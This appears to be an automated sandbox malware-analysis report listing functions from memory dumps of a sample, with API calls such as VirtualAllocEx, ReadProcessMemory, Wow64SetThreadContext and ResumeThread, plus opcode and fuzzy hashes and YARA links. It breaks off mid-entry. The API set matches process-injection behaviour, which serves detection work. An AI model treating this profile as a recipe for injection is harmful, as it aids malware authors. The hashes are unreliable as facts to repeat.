Opcode ID: 2b4f41fe63cac9e26fd6c4aee4eb36afd09b15d2977c7be3423acf8b229bad41
Instruction ID: 786217511b2c7703655f3699332d082c31530cb6c66f94cc5eaae2de2ef785e2
Opcode Fuzzy Hash: 2b4f41fe63cac9e26fd6c4aee4eb36afd09b15d2977c7be3423acf8b229bad41
Instruction Fuzzy Hash: D4216A75D003098FDB10DFAAC8817EEBBF4EF88310F148429D519A7241D7789945CFA0

Function 00C2D470 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C2DB6E,?,?,?,?,?), ref: 00C2DC2F

Memory Dump Source

Source File: 00000001.00000002.1451269605.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 416f18084218d25a11373a42f75f2de4afa517029074d5cf11746bd514b7bf1f
Instruction ID: f38c747cf0b096b65102be3fe195f97fd3dff770ceea3dac80b21d6301a83307
Opcode Fuzzy Hash: 416f18084218d25a11373a42f75f2de4afa517029074d5cf11746bd514b7bf1f
Instruction Fuzzy Hash: B821E3B5900359AFDB10CFAAD884ADEFBF9FB48310F14841AE919A3750D374A954CFA1

Function 06A97A90 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A97B10

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 99932823522ed63f8b9d2c393f51f79bc3a2dd2723cec8a3ce2c7184d26929fd
Instruction ID: 61c1b88469fa2c1d11e3f4f336cb8773b4a2c02e92fa555e297197f3c83769de
Opcode Fuzzy Hash: 99932823522ed63f8b9d2c393f51f79bc3a2dd2723cec8a3ce2c7184d26929fd
Instruction Fuzzy Hash: 5F2114B1D003499FDB10DFAAC880BEEBBF5FF48310F50882AE519A7250C7799940DBA0

Function 06A973D0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A9744E

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c8297e909d5f834f5882b92bf95b60167a227f3c0639d2c89c4b54ea3b7938ec
Instruction ID: eb9f3dd96d500545badb90e0b30206fc75939d8a2f9af88c4467cf0d8bf7b8bc
Opcode Fuzzy Hash: c8297e909d5f834f5882b92bf95b60167a227f3c0639d2c89c4b54ea3b7938ec
Instruction Fuzzy Hash: 70214775D003098FDB10DFAAC4857EEBBF4EF88324F14842AD519A7241DB789945CFA0

Function 06A978DA Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A9794E

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c3506d2b2ec9c9de9a861a2989a6255e444868d17720fdc0540e1dff40153bbe
Instruction ID: a2aad77d86ea763767b98a76bc45c36f98810cd7b0e710b6b3d1502cb3766654
Opcode Fuzzy Hash: c3506d2b2ec9c9de9a861a2989a6255e444868d17720fdc0540e1dff40153bbe
Instruction Fuzzy Hash: E01114768003499FDB10DFAAC845BDEBBF5EB88720F248819E519A7250C775A940DFA0

Function 06A978E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A9794E

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4144e09ff857a1954e267bba9a648c0b71fbbcc9b10740f04b99b2614d2ee348
Instruction ID: 887c97add37654caac5cec5ca29e4bb388fc8c36f52a672c5c9911b641509302
Opcode Fuzzy Hash: 4144e09ff857a1954e267bba9a648c0b71fbbcc9b10740f04b99b2614d2ee348
Instruction Fuzzy Hash: C61137758003499FDF10DFAAC844BDEBBF5EF88720F248819E519A7250C7759540DFA0

Function 06A97318 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06A97382

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: aa1fa256c68471a268bb9aa68690ff8151ca4b642f755f45e1ca804c3c9852ef
Instruction ID: 954904bb3025de86f5359a21cc19fc33cb1acf22ae843a0a5ec12ce68f40e10a
Opcode Fuzzy Hash: aa1fa256c68471a268bb9aa68690ff8151ca4b642f755f45e1ca804c3c9852ef
Instruction Fuzzy Hash: 17114675C003498FDB20DFAAC8457DFFBF5EB88620F248419D519A7240CB75A940CBA0

Function 06A97320 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06A97382

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 13be76a7941e4ecbe03a5f31bfdcdbb5f2d40f6b8f1945036cb0f65b8d0c4d8c
Instruction ID: 0bf67c636f541a8d994d4e19664e9ce1b16c0746033185bf76beca801c9e058b
Opcode Fuzzy Hash: 13be76a7941e4ecbe03a5f31bfdcdbb5f2d40f6b8f1945036cb0f65b8d0c4d8c
Instruction Fuzzy Hash: E2112875D003498FDB20DFAAC4457DEFBF5EB88624F248419D519A7240CB75A544CBA4

Function 06A96620 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06A9AA0D

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: da7df633c9d150465fd3bc06560be4d9a7d347fba26c2e39fd177557c07ededf
Instruction ID: 9a7e5e657a5f89c272b7fb27d46ec24ec28c10de99103676b3ebcec90af38a31
Opcode Fuzzy Hash: da7df633c9d150465fd3bc06560be4d9a7d347fba26c2e39fd177557c07ededf
Instruction Fuzzy Hash: 8811F5B58003499FDB10DF9AC884BDEFBF8FB48320F20841AE918A7610D375A944CFA5

Function 00C2B8C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C2B926

Memory Dump Source

Source File: 00000001.00000002.1451269605.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3a8258ce30235f5aa36717a5c791eca94563d8ac1f4b7be458e0ec83ede0df57
Instruction ID: bc757ccc7b5d1d96c0d85198ff9c139b6cbdcde84d7d5374677b2d0203f2578d
Opcode Fuzzy Hash: 3a8258ce30235f5aa36717a5c791eca94563d8ac1f4b7be458e0ec83ede0df57
Instruction Fuzzy Hash: 3811FDB5C006498BCB20DF9AD484B9EFBF4EB88320F10841AD528A7610C379A985CFA1

Function 069A7E78 Relevance: 1.5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

Strings

d, xrefs: 069A80C9

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 8d059195c8a86d88afa1f546ee65e403e9428efdb5a00f890ab1d881e9eb401d
Instruction ID: 4313dffdf6602e6a13bebbcf3d21e610f1e51624a24846754bc034a216db70a9
Opcode Fuzzy Hash: 8d059195c8a86d88afa1f546ee65e403e9428efdb5a00f890ab1d881e9eb401d
Instruction Fuzzy Hash: 1EC13834600702CFCB54CF58C98096AB7F6FF89314726CA69E56A8B661DB30FD56CB90

Function 069A0ED8 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

d, xrefs: 069A1024

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: c072eb466b12506282cb6625c8b5025865d28df857b15854f0f13a63d76010e1
Instruction ID: 86c443e2797c8188a294cca5fef739ec878b0c610a6bf3f14117e8fd00195bbe
Opcode Fuzzy Hash: c072eb466b12506282cb6625c8b5025865d28df857b15854f0f13a63d76010e1
Instruction Fuzzy Hash: 8C616774A007068FCB14DF59D5C08AAF7F6FF88310B10CA69D9299BA15DB30F961CBA0

Function 06A19398 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

%*&/)(#$^@!~-_, xrefs: 06A193C1

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: %*&/)(#$^@!~-_
API String ID: 0-3325533558
Opcode ID: 445ca3d56a0c783a4a3275b45f8af2b19a2b5753cbf5c6e99058a1b133bb1187
Instruction ID: 5d8703be2af48b98fdc50e9de5780f780e09d18fe111d78d8431a5cb2db1f7eb
Opcode Fuzzy Hash: 445ca3d56a0c783a4a3275b45f8af2b19a2b5753cbf5c6e99058a1b133bb1187
Instruction Fuzzy Hash: 7851C431B002049FD700BFA8D4557AE7BB2FB88700F1484A9DA86AF395DF316E49C785

Function 06A1938A Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

%*&/)(#$^@!~-_, xrefs: 06A193C1

Memory Dump Source

Source File: 00000001.00000002.1455035965.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a10000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: %*&/)(#$^@!~-_
API String ID: 0-3325533558
Opcode ID: a2dafdaf358bd55f928845ef60f49648c0eea1a6313af86bbf70a6b72680a11b
Instruction ID: 9f30b1337135378db4545c4aa4699a4ef482433fded50c3386073bd6a03c7f86
Opcode Fuzzy Hash: a2dafdaf358bd55f928845ef60f49648c0eea1a6313af86bbf70a6b72680a11b
Instruction Fuzzy Hash: ED51B331B042049FD700BFA8D4557AE7BB2EF88700F1484A9DA96AF395DF316E49C785

Function 06A3D508 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

@, xrefs: 06A3D671

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8cc802ac7f20b90d6c15aebd1678774105b7e10c3b080a4765f84bb2ff980a1a
Instruction ID: c1d44f0b6356fb7f33751a0e54d6294c4c9469715a7a604700ea5604abe31e44
Opcode Fuzzy Hash: 8cc802ac7f20b90d6c15aebd1678774105b7e10c3b080a4765f84bb2ff980a1a
Instruction Fuzzy Hash: 6B518E75E00219DFDB45EF68C880AAEBBF1FF88210F14846AF919EB251D734D954CBA0

Function 069AAE23 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

^5t, xrefs: 069AAF2C

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: ^5t
API String ID: 0-1343020086
Opcode ID: 646cebb1672734e6cbb0eb14a572f753804ef1f7938d57ae3dcfa054a2cb0dd5
Instruction ID: e998eed0a79b5894be415094d12e43eec64de6dc03d2df318ba646ca942ddc84
Opcode Fuzzy Hash: 646cebb1672734e6cbb0eb14a572f753804ef1f7938d57ae3dcfa054a2cb0dd5
Instruction Fuzzy Hash: CF410735B00214CFDB14EB64D954AAEB7F2EFC8711F684469E806A7395DE31ED42CB90

Function 06A3D4F7 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

@, xrefs: 06A3D53A

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: b53b1099d7f4dbab8c68eb6d562cb91efa281cfbe28972ffb94fb8d613b5e3a5
Instruction ID: 9415eecf8df88328ffe1c76369d427e9a165cc42ec9ac8b8564f72145a1dc548
Opcode Fuzzy Hash: b53b1099d7f4dbab8c68eb6d562cb91efa281cfbe28972ffb94fb8d613b5e3a5
Instruction Fuzzy Hash: 4A21E276A10229DFDB11DFA8D884ABE7BB5FF88310F048469F418DB201D734DA55CB90

Function 06A3EE80 Relevance: .6, Instructions: 598COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c083f086fef3a15bfe13710031c3e3ce3d811da86869955efb5ae9f13948d9
Instruction ID: 3ac0ba5e06f0ef29649dd096edf1a6318d3997dc279c6bd7c5c007375f60b655
Opcode Fuzzy Hash: 94c083f086fef3a15bfe13710031c3e3ce3d811da86869955efb5ae9f13948d9
Instruction Fuzzy Hash: 9D423874E102159FDB44EFA8D584A9EBBF2BF88310F158599E845AB361D730ED41CB90

Function 069A6D58 Relevance: .6, Instructions: 595COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ea2478d0eb2bd50c61e61f5ce50cb484d6f4c17476f217b4a752d11374d4c7
Instruction ID: 846146b16751fd0c1f86c4064bf80b48cea931faf5cf484254facef099c81281
Opcode Fuzzy Hash: 66ea2478d0eb2bd50c61e61f5ce50cb484d6f4c17476f217b4a752d11374d4c7
Instruction Fuzzy Hash: 05326A35700701CFDB54DF69C888A6ABBF6FF89205B2584A9E546CB762DB30EC45CB90

Function 06A3BB90 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a72bd5aad7983bd102df1ea76602a924804a141f4b87c2d1bf62f06845e179
Instruction ID: a5febcf3a337ed877f71977fd8eb0d9db74c1bd59481f950b2e5bc0c676b1dd7
Opcode Fuzzy Hash: e8a72bd5aad7983bd102df1ea76602a924804a141f4b87c2d1bf62f06845e179
Instruction Fuzzy Hash: F9423834A00715CFC765EF68D984A6ABBF2FF88311B158569E4469B652DB30FC41CF90

Function 06A3C2D0 Relevance: .5, Instructions: 532COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e5e6590bcded65d8c487e15e1db3a40391ebbe381486aed2276ee727514689
Instruction ID: 4aeb0cc9511b20a19db66865f4132e910d58b2cbdd514bc9fa65437648ead838
Opcode Fuzzy Hash: 75e5e6590bcded65d8c487e15e1db3a40391ebbe381486aed2276ee727514689
Instruction Fuzzy Hash: C912E035A043549FD750DB69D844BAABBF6FFC4221F1480AAE546EB752C730EC85CBA0

Function 069AE1E8 Relevance: .5, Instructions: 528COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f68cee470fbe04db3fa1f70dd80e5b19cff2750f7adc5b03305f115de2010ad
Instruction ID: beb04a918c9e2d28bdc7c5d2e233481c90779423b1274ccd67fe68e2ee672dc6
Opcode Fuzzy Hash: 2f68cee470fbe04db3fa1f70dd80e5b19cff2750f7adc5b03305f115de2010ad
Instruction Fuzzy Hash: 62127835B00311CFDB549F64D848B6ABBF6BB88711F248569E8069BBA1DB34DC42DBD0

Function 06A34800 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0fa3dec66b56f1a60b67dc268dc7340ed6928a4aaf18304b12f4b4ba036c29
Instruction ID: 3f8a733099390003ababfde6809954fe23d6eb2b627c24c46f3a7fe14bd938ec
Opcode Fuzzy Hash: 6c0fa3dec66b56f1a60b67dc268dc7340ed6928a4aaf18304b12f4b4ba036c29
Instruction Fuzzy Hash: 55F13874B00214DFDB48EFA4D998A6DBBF2EF88311B148069E906DB3A5DB34DD41CB91

Function 069AF2D0 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc8b45c1d842a5660f7298168fc9abffcce998515b042a319ddfcb8c184ee8a
Instruction ID: 9cc225301602b3e481503c8260154bf775bc94ee01a67ac6414dd300859edc47
Opcode Fuzzy Hash: 8fc8b45c1d842a5660f7298168fc9abffcce998515b042a319ddfcb8c184ee8a
Instruction Fuzzy Hash: A6F12875B106018FDB54DF2AC489A6EBBE6FF89310F198469E546CB761CB34EC01CB91

Function 069AB588 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 754f8c21e4444813a91637d79eb8ce18ccc3d7a6daa5680ba241e7d6856505e1
Instruction ID: 9a555dd998cf3cc951de2cd155eeec77cdf2b4216193eafdf7e9c7f591b9ee04
Opcode Fuzzy Hash: 754f8c21e4444813a91637d79eb8ce18ccc3d7a6daa5680ba241e7d6856505e1
Instruction Fuzzy Hash: 90D1C231F01326CFEB918F68894462EBBE6AF88A10F25455EE846DBB59DB70CC41C7D1

Function 06A38BC8 Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21702ee57e74c5299e5180dda7a9724c721532b415655cd32edfdacd5124ac6
Instruction ID: 65f82530f8a6fb7acaaae15b26bc04a29ba2c75764f27d11631b22c9f713a931
Opcode Fuzzy Hash: f21702ee57e74c5299e5180dda7a9724c721532b415655cd32edfdacd5124ac6
Instruction Fuzzy Hash: 80E1D030A013509FD751EF28D484A5ABBF2EF85311B19C5AAE549CF362CB34EC45CBA1

Function 069AE8B0 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a076b4737f5b5c7712c15f0896817bf35e17a8bdda6dfb95680b888faba4f12
Instruction ID: 2726dad436c0e6cc3d0633b828695e19a0360245443fb17dbf93605e3abd674c
Opcode Fuzzy Hash: 2a076b4737f5b5c7712c15f0896817bf35e17a8bdda6dfb95680b888faba4f12
Instruction Fuzzy Hash: 77D12934B003158FDB88DF68C888A6A7BF6AFC8701B148569E506CBB95CB74DD41EBD0

Function 06A38838 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f99a220eaa5c1957eb461787afecac4c51b6dd4e3169f50f0c35d9b8d7d8e808
Instruction ID: ed9e7c81e91ea664588873faff76b2b74e1e4a5d907ecd9b5534795e2a578733
Opcode Fuzzy Hash: f99a220eaa5c1957eb461787afecac4c51b6dd4e3169f50f0c35d9b8d7d8e808
Instruction Fuzzy Hash: 42C19A35B013409FE391DF24D484A56BBF2EFC5261B1984AAF549CB7A2CB34EC85CB60

Function 06A33BA8 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bb3eec6057e9df2344f79bce4467bf11f8cdbc7f5d72a92a669745ce268e5b2
Instruction ID: e808bbcafad43194e44aacb95f242dc58f9e2513536826c7901497f71557609f
Opcode Fuzzy Hash: 2bb3eec6057e9df2344f79bce4467bf11f8cdbc7f5d72a92a669745ce268e5b2
Instruction Fuzzy Hash: 49B1AE34B087A19FEFA0EF24C44472AB7F6AF84601B148869F546DF641DB34EC85CBA0

Function 06A347F3 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804ff2e2416bcd73f5ecc0d6d1ed4417bb7f0799d1ef53b193545400fc47cc35
Instruction ID: 0cd19fe64392f82d5ccb83cff7d82a052212a1a68d6b47c8719768a4262e39ce
Opcode Fuzzy Hash: 804ff2e2416bcd73f5ecc0d6d1ed4417bb7f0799d1ef53b193545400fc47cc35
Instruction Fuzzy Hash: 78B13A74B00214DFDB45EFA4D998AADBBF2FF88311B148069E906DB3A1DB35D941CB90

Function 06A3AC58 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455143354.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a30000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e793ca8124484fef48037efaf325e0a310b895efb7908791a942bd874ab147b1
Instruction ID: 15b457ecd4b479cadf9e984b0c49b0a8b89584a674997051756d9823c3c97365
Opcode Fuzzy Hash: e793ca8124484fef48037efaf325e0a310b895efb7908791a942bd874ab147b1
Instruction Fuzzy Hash: 5CB1A130604370CFE7A1DF18C588B65BBE2EF41355F4884A9E5858F6A2D779F884CB90

Function 069A6D56 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14a1ab111824b8f38d22ba8ba04d06f22cd0fabf5093e420d31c0faf15eb8a47
Instruction ID: 1a74ad3953776b066da0b983190c82ac74bf5c50c4d147a3656fcf50d28653c3
Opcode Fuzzy Hash: 14a1ab111824b8f38d22ba8ba04d06f22cd0fabf5093e420d31c0faf15eb8a47
Instruction Fuzzy Hash: E9B15A34B00605CFDB54DF69C898A6EBBF6FF89605B2580A9E446DB761CB30EC01CB90

Function 069A63F8 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0fbd75d352c92f97b735f8a1086e1963f8cc771968ec9a3db41e69e06db1784
Instruction ID: bceb749296fbce2ccbc530f4bff95299b75b2c16516ab72f977d7ce5873fe47c
Opcode Fuzzy Hash: a0fbd75d352c92f97b735f8a1086e1963f8cc771968ec9a3db41e69e06db1784
Instruction Fuzzy Hash: 38A13934F002158FDB54DF68C554AAEBBF6BFC8601B28816AD905EB755DB34DC42CBA0

Function 069A6718 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1454799643.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69a0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a67be4ab1386fd0148187d9bf6131cc4daa2364d6b6951302576562ad77193
Instruction ID: d039e1b954e2c49183d2fe5d9b3f56e3d72483550d079f6d49389ce42c20848d
Opcode Fuzzy Hash: 43a67be4ab1386fd0148187d9bf6131cc4daa2364d6b6951302576562ad77193
Instruction Fuzzy Hash: 0AA15A35B002148FD744DB78C894AAEBBF6FF89710B298469E506EB761DB31EC01CB90

Function 069A0701 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

